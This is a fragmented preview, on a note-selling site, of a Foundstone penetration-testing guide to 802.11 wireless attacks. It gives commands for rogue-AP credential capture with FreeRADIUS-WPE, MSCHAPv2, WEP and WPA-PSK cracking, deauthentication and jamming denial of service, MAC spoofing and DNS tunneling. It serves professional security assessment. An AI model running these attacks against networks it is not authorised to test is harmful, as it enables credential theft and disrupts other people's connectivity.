Search for notes by fellow students, in your own course and all over the country.
Browse our notes for titles which look like what you need, you can preview any of the notes via a sample of the contents. After you're happy these are the notes you're after simply pop them into your shopping cart.
My Basket
Types of Unemployment for A LEVEL and DEGREE£1.50
48. Exam Papers for Leadership Development in BBA (With Answers)£10.00
Total£11.50
Or: Edit My Basket
Document Preview
Extracts from the notes are below, to see the PDF you'll receive please use the links above
802
...
0
Author:
Brad Antoniewicz
Senior Security Consultant
Foundstone Professional Services
1
www
...
com | 1
...
91
...
2
Introduction
...
4
Security and 802
...
4
WPA/WPA2
...
5
Equipment
...
6
Software
...
11
802
...
11
The EAP Handshake
...
14
AP Impersonation
...
22
Rogue Access Points
...
23
Implementation Attacks
...
27
Dynamic WEP
...
33
WPA-PSK Cracking
...
38
EAP-MD5 Brute Force
...
39
Wireless Client Adapters
...
39
Denial of Service Attacks
...
41
Queensland DoS
...
45
Wordlist tips
...
46
2
www
...
com | 1
...
91
...
11 wireless technologies for a couple years now and although things are
starting to improve, I still do not see many step by step or “How to” guides that give detailed instruction on
performing 802
...
org aside)
...
There are some areas where I just point you in the right
direction, usually towards the right tool, but ideally, these areas will be further described and covered in the
next release of the paper
...
Although I’ll provide a brief background into 802
...
11 standard, but instead should provide you with adequate
information to understand 802
...
I’ll continue to update this paper as I further experiment with new
attacks, so please stay tuned for updates
...
foundstone
...
877
...
FOUND
Background
IEEE 802
...
More specifically, working group 11 of the 802 category for LAN/MAN technologies has been reserved
for defining the standards of wireless local area networks (WLAN) operating in the 2
...
To ease the overwhelming increase of technical jargon, the term “Wi-Fi” has been adopted to refer to
the IEEE 802
...
It should be noted that the Wi-Fi alliance had first coined
the term to define a slightly different set of standards, however it is still commonplace to use the terms
[IEEE] 802
...
Since its initial release in 1997, 802
...
Each amendment to the original IEEE 802
...
Amendments A, B, G, N, and I are most recognizable as they’ve made notable changes to
the original standard
...
11 a/b/g/n generally define the implementation’s frequency spectrum and
modulation
...
11a operates in the 5GHz spectrum, using OFDM to obtain 54Mbit/s data rate,
whereas 802
...
4GHz spectrum using DSSS to obtain 11Mbit/s data rate
...
11g
expands on 802
...
4GHz spectrum to match the 54Mbit/s data rate of
802
...
In addition to other enhancements, 802
...
IEEE 802
...
11 standard
...
11
Due to the borderless nature of 802
...
Wired Equivalent Privacy (WEP)
became the first attempt at security
...
IEEE 802
...
Unfortunately, due to the early adoption of wireless technologies,
WEP is still in use by many companies and consumers alike
...
11i, wireless technology vendors attempted to address the issues with WEP by releasing additional
mechanisms to mitigate the risk of WEP implementations
...
foundstone
...
877
...
FOUND
crack WEP has been drastically reduced; meaning that no implementation of WEP should be considered
secure
...
11i introduces two areas of authentication to the 802
...
WPA Enterprise leverages IEEE 802
...
11 suite) which relies on the extensible
authentication protocol (EAP) to relay authentication messages from a wireless client (supplicant) through the
access point (authenticator) to a RADIUS server (authentication server)
...
However, when it is combined with more sophisticated and proven authentication
mechanisms, such as TLS, it becomes a reliable means of authentication
...
This string can be anywhere between 8 and 63 characters
...
11i standard was released
...
To offer greater security, CCMP, an AES based encryption protocol was released in the final
IEEE 802
...
CCMP is currently the only cryptographically sound protocol for
802
...
The lack of a physical boundary as previously relied on with standard Ethernet networks is the major appeal
of wireless networks to attackers
...
With wireless networks, this is obviously not the case
...
5
www
...
com | 1
...
91
...
11 standard
...
11 standard, clients must perform certain actions based on
what the access point instructs them to do
...
Unfortunately, management frames are sent unencrypted through the air and there
is no mechanism to ensure the identity of the access point other than its Media Access Control (MAC)
address
...
Equipment
Choosing the right equipment is a crucial step
...
By planning ahead, you will end up saving yourself a great deal of
time and heartache
...
Over time, adapters may fail and yield less than accurate results or you may need to
perform a certain unexpected task which may require specialized hardware
...
Client Adapters - Over the past years, a number of different wireless client adapter chipsets have been
deemed, “the hacker’s choice”
...
The most popular chipset in today’s 802
...
In addition to chipset, another concern is band
...
11 wireless networks only
operate at 2
...
When choosing your
client adapter, be mindful of which bands it supports as this may be a deciding factor in the success of an
attack
...
11 wireless adapters
...
foundstone
...
877
...
FOUND
Table 1: Popular Client Adapters
Client Adapter
Ubiquiti SuperRange Cardbus
Description
Basic Specs:
Bands: 802
...
4 and 5GHZ
Transmit Power: 300mW
External Connectors: (2x)MMCX
Chipset: Atheros AR5213/AR2112
Very popular card due to its high transmit power, dual
band support and external connectors
...
com/products_src
...
11 a/b/g 2
...
Just about every
Windows 802
...
URL:
http://www
...
com/Products/Adapters/
AGDualBandWirelessAdapters/WAG511
...
11b/g 2
...
URL:
http://www
...
net/servlet/the90/AWUS036H-Alfa-500mW-USB/Detail
AirPCAP
Basic Specs:
Bands: 802
...
4ghz
Deserves mention as it works well within Windows
with tools such as Cain & Abel
...
foundstone
...
877
...
FOUND
http://www
...
com/products/airpcapclassic
...
11 wireless adapter to serve as an
access point within Linux, it may be preferable to purchase a standalone, off the shelf access point
...
Table 2: Good all-around access points
Access Point
Apple Airport Extreme Base Station
Description
Bands: 802
...
11b/g (2
...
11n operating at either 5Ghz or 2
...
Combined
with its relatively low price, it serves as a good, multipurpose addition to your toolkit
...
(Looking for an OpenWRT/DD-WRT flash)
Buffalo WHR-G54S running OpenWRT
Bands: 802
...
4Ghz)
Comments: OpenWRT (or DD-WRT) adds such a
wealth of functionality to these low cost access points
that they immediately become a must have addition
to the toolkit
...
(Although
there is a Linux version available)
Downsides: Only supports 802
...
8
www
...
com | 1
...
91
...
This concern has since faded due to the availability of Live Distributions
...
It contains just about every tool,
driver, and kernel patch that you could think of
...
The common method of booting BackTrack is via USB stick
...
remote-exploit
...
iso or
...
(This step is
shown in the screenshot
below)
Change boot priority within
your BIOS to ensure it is
set to boot off of USB
...
bat
Follow on screen instructions
This step is manufacturer specific, but you’ll want to look for “Removable
Media” or “USB Drives” within your BIOS and move them above the primary
hard disk
...
foundstone
...
877
...
FOUND
Figure 1: Reformating the MBR on your USB Stick
With your BackTrack USB stick inserted, start your computer
...
10
www
...
com | 1
...
91
...
By simply observing the network using a wireless sniffer, the attacker can find a good
amount of information concerning the wireless deployment
...
11 Beacons
Beacons are 802
...
By default, these frames have a range of fields containing connection related
information such as SSID and supported data rates
...
This information can aid in social engineering attacks, or aid the attacker
in targeting access points with a large number of connected clients
...
e
...
) of the network
...
11
www
...
com | 1
...
91
...
1x authentication with WPA-Enterprise
EAP Response Identity: Once a client finishes its basic association, the authenticator (access point) sends
an “EAP Request Identity” to the client
...
Some configurations may set this field
to “anonymous” for security reasons which tell the authentication server to rely purely on the credentials
provided within the inner authentication protocol
...
foundstone
...
877
...
FOUND
username of the client in this field, providing the attacker with enough information to manually test
passwords
...
Performing the attack:
These messages are transmitted in the clear when a client is establishing connectivity to the wireless
network
...
Figure 4: Username contained in the EAP Response Identity frame (Wireshark)
13
www
...
com | 1
...
91
...
These types of vulnerabilities are normally easy to take advantage of and are often the result
of an oversight, or ignorance on the behalf of those responsible for the network
...
This can be achieved by establishing an access point with the same SSID
(Service Set Identifier) as the target networks’
...
has configured its wireless network with the SSID of “AcmeCorp”, wireless clients
will probe (a process where the client blindly sends broadcast requests to identify if the wireless network it is
configured for is nearby) for that SSID
...
An observant attacker can configure an access point to respond to “AcmeCorp” requests and, ultimately trick
the client into connecting to its access point
...
Another important note is that as long as the client’s wireless adapter is
turned on, the client system will always probe to see if it’s in range of the wireless networks for which it’s
configured
...
14
www
...
com | 1
...
91
...
Joshua
Wright and myself have come together to release a modified version of FreeRADIUS (an open sourced
RADIUS authentication server), named FreeRADIUS-WPE
...
This attack targets EAP/TTLS and PEAP networks
...
It is common, however, that client systems are
not properly configured to validate the authentication server’s TLS certificate or the client supplicant puts the
decision to decide whether or not to connect with a non-validated certificate
...
Depending on the inner authentication protocol used,
these credentials can be passed in clear text, or may be subject to a brute force attack
...
15
www
...
com | 1
...
91
...
It
modifies the server so that it outputs the entire inner authentication data used when establishing EAP-TTLS
and PEAP authentications
...
0
...
willhackforsushi
...
html
ftp://ftp
...
org/pub/freeradius/freeradius-server-2
...
1
...
gz
Setting up the Access Point
The access point contains a relatively simple configuration as it is generally agnostic tomost EAP types
...
FreeRADIUS-WPE comes
already configured to accept authentication requests from any user and any access point
...
To make things easier, simply configure your access
point to use FreeRADIUS-WPE’s default shared secret of “test” (without quotes)
...
Table 5: FreeRADIUS-WPE Access point configuration
Item
RADIUS Server
RADIUS Shared Secret
16
Description
Access Point setting defining where to forward EAP requests
...
By default, FreeRADIUS-WPE is set with the shared
secret of “test”
...
foundstone
...
877
...
FOUND
Figure 6: WPA-Enterprise configuration on OpenWRT
Another important thing to mention is that although I am using an off the shelf access point for this setup,
you may just as easily use hostapd (http://hostap
...
fi/hostapd/) to combine all elements of the attack
into a single machine
...
All configuration files have been set up
to accept any authentication and return successful for most authentication attempts
...
Table 6: FreeRADIUS-WPE installation
Description
Extract the FreeRADIUS
2
...
1 source (Fig
...
0
...
tar
...
foundstone
...
877
...
FOUND
Copy the FreeRADIUSWPE patch into the
extracted directory
(Fig
...
1
...
0
...
7)
cd freeradius-server-2
...
1/
Patch the FreeRADIUS
source using the
FreeRADIUS-WPE patch
(Fig
...
1
...
7)
Change into the certificates
directory (Fig
...
/configure && make && make install && ldconfig
Generate certificates using
the bootstrap script
(Fig
...
/bootstrap
18
cd /usr/local/etc/raddb/certs
www
...
com | 1
...
91
...
foundstone
...
877
...
FOUND
Figure 8: Generating certificates
Once FreeRADIUS-WPE has been installed, it is all ready to run
...
Table 7: FreeRADIUS-WPE Defaults and key files
Configuration File/Directory
/usr/local/etc/raddb
/usr/local/var/log/radius/freeradiusserver-wpe
...
conf
/usr/local/etc/raddb/users
/usr/local/etc/raddb/clients
...
conf
Description
General configuration directory for the default
installation of FreeRADIUS
Default WPE log file location, stores all captured
credentials
Enables/Disables EAP Types, the majority should be
enabled by default
Local users file for all user accounts, it should contain
default entries so users are automatically accepted
Contains all of the RADIUS clients (i
...
access points)
by default it should have all RFC 1918 addresses
included
General FreeRADIUS configuration file, the
“wpelogfile” setting defines where WPE should
log its captured credentials
Once your setup is completed, simply start “radiusd” and let it run in the background
...
Figure 9 shows two clients connecting; one using PEAP
20
www
...
com | 1
...
91
...
Because PAP is clear text, you’ll notice the password
itself is directly outputted
...
Figure 9: FreeRADIUS-WPE in action
The first entry in Figure 9 displays a user connecting with PEAP using MSCHAPv2 as its inner authentication
protocol
...
One
notable item here is that it is extremely common for Windows clients to use domain authentication during this
process, meaning that if the MSCHAPv2 credentials are brute forced, the attacker now has access to the
Windows Domain!
Cracking MSCHAPv2
Now that we have the MSCHAPv2 challenge and response, we can use ASLeap to crack these directly from
the command line
...
willhackforsushi
...
1/asleap-2
...
tgz
www
...
com | 1
...
91
...
txt
Attribute
-C
Description
Specifies the Challenge
-R
Specifies the Response
-W
Specifies the dictionary
Default Configurations
Wireless device manufacturers have made it possible for the average home user to take advantage of
wireless technologies by making them easy to set up and configure
...
Because of these reasons, it is very common for Small Office / Home Office (SOHO) users to set up
a completely unsecured wireless network, not changing any of the manufacturer default settings
...
foundstone
...
877
...
FOUND
becomes a huge risk as attackers can target these unprotected networks and gain complete control over
them with little effort
...
Finally, it should be noted that default configuration attacks are not
only applicable to SOHO users, but are often found in corporate settings due to negligence by responsible
parties
...
Rogue access points are a huge and often overlooked threat to corporate
networks
...
Additionally, rogue access points can be set up by an attacker purposefully to obtain
unauthorized access to the network later on at his/her leisure
...
Using an off the shelf
device, an attacker can easily set up an AP to perform traffic monitoring or just offer a wireless backdoor into
your network
...
WKnock-ng was created by Laurent Oudot to make it more difficult for opportunistic attackers to detect
wireless access points and attack them
...
Description
WKnock-ng
OpenWRT
Link
http://www
...
org/oudot/wknock/
http://www
...
org
Captive Portal Circumvention
A captive portal is, essentially, a technique in which all user traffic is trapped and redirected to a particular
destination
...
The client is
usually redirected to a web-based authentication page which requires valid login credentials (or the
agreement of an acceptable use policy) before permitting the client to access the internet
...
11 wireless networks most often as a means of providing guest internet access
...
23
www
...
com | 1
...
91
...
This is accomplished by changing the wireless adapter’s MAC address to match that of an
already connected client
...
Note: You must wait until the previously
authenticated client is off the network before assuming their MAC address
...
To make
life really easy, BackTrack includes “machanger
...
This utility works excellently
...
So to
make sure that everything works properly, I’ve created the following script to change your MAC address
without issues when using an Atheros adapter
...
sh - Atheros MAC Changer
# by brad a
# foundstone
#
if [ -z "$1" ]; then
echo Atheros MAC Changer
echo ----------------------echo IMPORTANT: this assumes we want to change the MAC of wifi0
echo "
if you want to change the MAC of another wifi interface"
echo "
(i
...
wifi1, wifi2, etc
...
foundstone
...
877
...
FOUND
echo -Destroying VAPs:
for i in $( ls /proc/net/madwifi ); do
wlanconfig $i destroy 2>&1 /dev/null
echo -e "\t$i - destroyed"
done
echo -Downing wifi0
ifconfig wifi0 down
echo -Using macchanger to change MAC of wifi0
macchanger -m $1 wifi0
echo -Bringing wifi0 back up
ifconfig wifi0 up
echo -Bringing up one VAP in station mode
wlanconfig ath create wlandev wifi0 wlanmode monitor -bssid > /dev/null
echo -All done!
echo -Confirm your settings:
echo -----------------------------------------------------ifconfig wifi0
echo ------------------------------------------------------
Figure 11: athmacchange
...
If you’re lucky however, your driver may already permit this, so it’s
worth a check into the advanced section of your adapters’ driver properties
...
foundstone
...
877
...
FOUND
Figure 12: Changing MAC address in Windows Advanced adapter properties
DNS Tunneling: DNS Tunneling is an extremely useful technique in circumventing captive portals as well as
outbound Internet access filters
...
The attacker leverages the queries that support somewhat
lengthy fields and, uses the default name server to relay the messages between the client and the attacker’s
server
...
With an SSH access, an attacker can effectively
gain completely unrestricted outbound access by tunneling other protocols through SSH
...
Description
OzymanDNS
SSH Tunneling Step by
Step
Excellent DNS tunneling
document
26
Link
http://www
...
com/ozymandns_src_0
...
tgz
http://www
...
com/wiki/Main/SSHOverDNS
http://www
...
be/maarten/dnstunnel
...
foundstone
...
877
...
FOUND
Implementation Attacks
Implementation attacks target systemic issues within the way IEEE 802
...
WEP Cracking:
WEP is widely publicized as an insecure protocol; so much that in 2005, the FBI demonstrated defeating WEP
in approximately three minutes
...
Named “aircrack-ptw”, this attack confirms WEP’s
deficiencies by greatly reducing the time it takes to recover a key
...
Aircrack-ng
...
Also,
since aircrack-ng 0
...
0, the aircrack-ptw attack has been included
...
aircrack-ng
...
php
http://www
...
org/doku
...
Dynamic WEP operates very similar to the way WPA Enterprise works by relying on IEEE 802
...
The obvious difference between WPA Enterprise and Dynamic WEP is the use of WEP for
data encryption
...
As its name
implies, the broadcast key is a shared key which is used to encrypt broadcast traffic
...
Without possibly effecting users, the
safest and lowest amount of time between key rotations is 5 minutes
...
So now the
attacker can inject and decrypt within the timeframe the key remains constant
...
foundstone
...
877
...
FOUND
Performing the Attack
To identify when the key is being rotated, take about 30 minutes and capture all the traffic you can
...
Although this can be useful, in practice
I’ve never needed to time my attacks so precisely
...
For 802
...
CiscoAP1#sh run
Building configuration
...
3
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname CiscoAP1
!
logging console informational
enable secret 5
!
ip subnet-zero
!
!
aaa new-model
!
!
aaa group server radius radius_servers
server 192
...
11
...
foundstone
...
877
...
FOUND
!
!
ssid DynamicWEPTest
!
speed basic-1
...
0 basic-5
...
0
no power client local
power client 5
channel 2437
station-role root
infrastructure-client
bridge-group 1
bridge-group 1 subscriber-loop-control
bridge-group 1 block-unknown-source
no bridge-group 1 source-learning
no bridge-group 1 unicast-flooding
bridge-group 1 spanning-disabled
!
interface FastEthernet0
no ip address
no ip route-cache
duplex auto
bridge-group 1
no bridge-group 1 source-learning
bridge-group 1 spanning-disabled
!
interface BVI1
ip address 192
...
11
...
255
...
0
no ip route-cache
!
ip http server
no ip http secure-server
ip http help-path http://www
...
com/warp/public/779/smbiz/prodconfig/help/eag
ip radius source-interface BVI1
!
radius-server host 192
...
11
...
This is because when we’re cracking WEP, we’re usually focusing on injection techniques that inject
broadcast frames
...
This step
should be pretty straight forward
...
29
www
...
com | 1
...
91
...
This should
automatically create a monitor mode
Virtual AP (VAP)
...
sh $CL
Launch the ChopChop attack and filter
broadcast traffic
...
255
...
255 -l
255
...
255
...
xor -w
arprequest
...
(Be sure “airodump-ng” is
capturing the traffic)
While that’s running, start aircrackng and crack the key (1
...
If
there is a lot of traffic, you may just
want to wait and then filter only
broadcast traffic from the capture
aireplay-ng --interactive -x 512 -r
arprequest
...
bkey-01
...
foundstone
...
877
...
FOUND
Figure 14: ChopChop Frame selection and attack (Broadcast key)
Session Key – Although not extremely complicated, the session key is slightly more difficult to crack
...
Therefore, in order to actually crack the
session key, you’ll have to use more strict filtering rules
...
Description
Launch the ChopChop attack
...
Once you’ve gotten the PRGA file, use
packetforge-ng again, but use the
decrypted replay_dec[whatever]
...
With that
information, you can specify a targeted
ARP request to an IP on the same
subnet
packetforge-ng --arp -a $AP -h $CL -c
00:0C:29:75:F1:14 -k 192
...
11
...
168
...
78 -w arprequest
...
xor
31
www
...
com | 1
...
91
...
Be sure airodump-ng is
capturing the traffic
...
skey ath0
Start aircrack-ng again to crack the
key
...
Then, filter all the unicast traffic
so it doesn’t mess up aircrack
...
aircrack-ng DynamicWEP
...
cap
Figure 15: ChopChop Frame selection and Attack (Session Key)
Troubleshooting: The main issue I see when performing this attack is that Aircrack-ng doesn’t work well
with 802
...
You’ll know if this is your problem if you open your capture in wireshark
32
www
...
com | 1
...
91
...
Unfortunately, I don’t have an immediate solution to this
issue
...
This attack demonstrated that an attacker can recover a WEP key without being in the same vicinity of the
corporate wireless network by targeting isolated clients in public areas such as airports or coffee shops
...
It’s unclear whether Sergey was first to develop the idea
...
Unfortunately, I haven’t had much luck with wep0ff but, since it’s the only publically released tool which
demonstrates this attack, it deserves mention
...
ptsecurity
...
tar
...
This can be
forced by leveraging the de-authentication denial of service attack
...
As you review these attacks, keep an eye on the speed in which it takes to crack the key
...
churchofwifi
...
These tables were generated using a list
33
www
...
com | 1
...
91
...
It should be noted that the hash captured during the 4-way
handshake is generated using the SSID of the network, meaning that these rainbow tables are SSID
dependant
...
You’ll see below the drastic difference in speed when using rainbow tables
...
churchofwifi
...
txt
http://umbra
...
com:6969/torrents/wpa_psk-h1kari_renderman
...
net/gps/gps/main/ssidstats
www
...
com | 1
...
91
...
dump -s linksys -d /wpapsk-tables/xai-0/linksys
Attribute
-r
-s
Specify the SSID of target network
-d
35
Description
Specify de-authentication attack with number of
deauth frames to send
AP MAC Address
www
...
com | 1
...
91
...
dump
Attribute
-w
Description
Specifies the dictionary file to use
The last attribute is the capture of the 4-way
handshake
coWPAtty: coWPAtty is another WPA-PSK cracking tool which can accept input from standard in as a
wordlist for its dictionary attack
...
36
www
...
com | 1
...
91
...
dump -s "linksys"
Attribute
Description
Specifies the dictionary to be used
-f
Specifies the PCAP file containing the 4-way
handshake
Specifies the SSID of the target network
-r
-s
We can use “john the ripper” to create a nicely mangled wordlist and output to standard out so that we can
redirect the output to coWPAtty (see the “Wordlist Tips” section for more information)
...
lst –-rules –-stdout | cowpatty -r wpapsk-linksys
...
www
...
com | 1
...
91
...
This was further demonstrated using the “asleap” tool
...
Description
ASLeap
Link
http://www
...
com/code/asleap/2
...
1
...
By capturing the handshake, it is
possible to launch an offline brute force attack against it
...
Performing the Attack
eapmd5pass: To demonstrate this attack, Joshua Wright created the eapmd5pass tool
...
eapmd5pass –r EAPMD5-Challenge-01
...
txt
Attribute
-r
-w
38
Description
Specify a capture file containing the EAPMD5 challenge handshake
Specify a wordlist to test the handshake
against
www
...
com | 1
...
91
...
These attacks stem from the lack of proper bounds checking and
other issues most commonly found in applications
...
Wireless Client Adapters
In recent years, a number of vulnerabilities were identified in wireless adapter drivers which allowed remote
compromise
...
Another issue identified in Intel wireless device drivers also yielded the same results on
Windows systems
...
Fuzzing
Due to the closed source nature of Windows device drivers and wireless infrastructure devices, vulnerability
discovery is often left up to the work of fuzzing
...
This process can result in the application crashing, often
indicating a lack of proper bounds checking
...
This process is usually performed in a testing environment, rather than used as an active attack
...
1 now supports Lorcon (http://802
...
net/lorcon); a generic library for frame
injection
...
Metasploit 3
...
11 modules; some of which support 802
...
Description
Metasploit
39
Link
http://www
...
com/
www
...
com | 1
...
91
...
This presentation is a required read if you
are getting into the realm of 802
...
Description
Raw Wireless Tools
“Wi-Fi Advanced Fuzzing”
Presentation
Link
http://rfakeap
...
org/
http://www
...
com/presentations/bh-europe-07/Butti/Presentation/bh-eu07-Butti
...
11 fuzzing in mind
...
Description
Airbase
Link
http://www
...
11mercenary
...
tar
...
I haven’t had very good luck
with it however it is seen to be very powerful because of its Python base
...
secdev
...
foundstone
...
877
...
FOUND
Denial of Service Attacks
Denial of Service attacks result in a disruption of the connection between an authorized client and the access
point
...
11 wireless networks are more susceptible to these types of attacks because
the standard heavily relies on the use of MAC addresses for identification
...
11 standard defines certain conditions where the client must obey an
instruction originating from the access point to which it is associated
...
11 management frames in a way which tricks the client into
thinking the access point wishes it to disconnect
...
However, by flooding the client with de-authentication frames, an
attacker can effectively force the client to constantly reconnect and disconnect
...
Using the BackTrack Linux distribution, you should be able to perform this attack with ease
...
Aircrack-ng Suite: To perform the attack using the Aircrack-ng Suite, simply type:
aireplay-ng –-deauth 25 –h
Attribute
--deauth
-h
Target MAC Address
-b
AP MAC Address
ath1
41
Description
Specify de-authentication attack with
number of deauth frames to send
Injection interface
www
...
com | 1
...
91
...
11 injection tool
...
11
frames to be injected within its packets directory
...
To perform a DeAuth attack using File2Air,
simply:
file2air –i ath0 –n 65000 –d
packets/deauth
...
MDK2 is cool because of its “mass deauth” feature which is meant to disconnect everyone within
range
...
To
perform the DeAuth attack using mdk2:
/pentest/wireless/mdk2-v31/mdk2 ath0 d
Attribute
ath0
d
42
Description
Interface to use for injection
Tells mdk2 to run Deauth Amok Mode
www
...
com | 1
...
91
...
Coined after
the Queensland University of Technology, this attack demonstrates that if a card is placed into continuous
transmit mode on a specific channel, all wireless activity in the immediate vicinity on that channel is halted
...
Performing the Attack:
Atheros Chipsets - In order to obtain FCC approval for their drivers, the Madwifi team had to build in
continuous transmit functionality into the DFS branch
...
Description
Download the madwifi-dfs
source
Modify if_ath_radar
...
madwifi
...
c
-Line 152: remove "inline" from the function prototype of
interval_to_frequency
-Line 851: remove "inline" from the function declaration of
interval_to_frequncy
Compile and install
Insert adapter and bring up
interface
Set interface to target
channel
Place card into continuous
transmit mode
Stop continuous transmit
mode
make && make install
ifconfig ath0 up
iwconfig ath0 channel 6
iwpriv ath0 txcont 1
iwpriv ath0 txcont 0
Figure 19: Performing the Queensland Denial of Service attack
Prism Chipsets – Using a Prism based wireless adapter, the Queensland DoS can be performed with the
Prism Test Utility
...
Simply select the adapter and channel then click “Continuous Tx”
...
foundstone
...
877
...
FOUND
To obtain the Prism Test Utility, try Googling for “PrismTestUtil322”
...
zip
PrismTestUtil322
...
foundstone
...
877
...
FOUND
Miscellaneous
This section is dedicated to the items that are not specifically 802
...
11 wireless attacks
...
Whether you’re trying to brute
force a pre-shared key or MSCHAPv2 credentials, it’s beneficial to know different techniques we can use to
generate a good wordlist to test
...
lst
Church of WiFI WPA-PSK
rainbow tables wordlist
BackTrack’s included
wordlist
Link
ftp://ftp
...
com/pub/wordlists/all
...
churchofwifi
...
zip
/pentest/password/dictionaries/wordlist
...
John the ripper can do a good amount of this using its
permutation rules
...
john –-wordlist=all
...
ini)
Output words to standard out
www
...
com | 1
...
91
...
Antoniewicz has over seven years of experience within information technology
...
11 wireless assessments
...
Brad has also
developed internal tools for internal/external/wireless penetration testing and
courseware for the “Ultimate Hacking: Wireless Course”
...
Inc
...
Through a strategic approach to security, Foundstone identifies and implements the right balance of
technology, people, and process to manage digital risk and leverage security investments more effectively
...
46
www
...
com | 1
...
91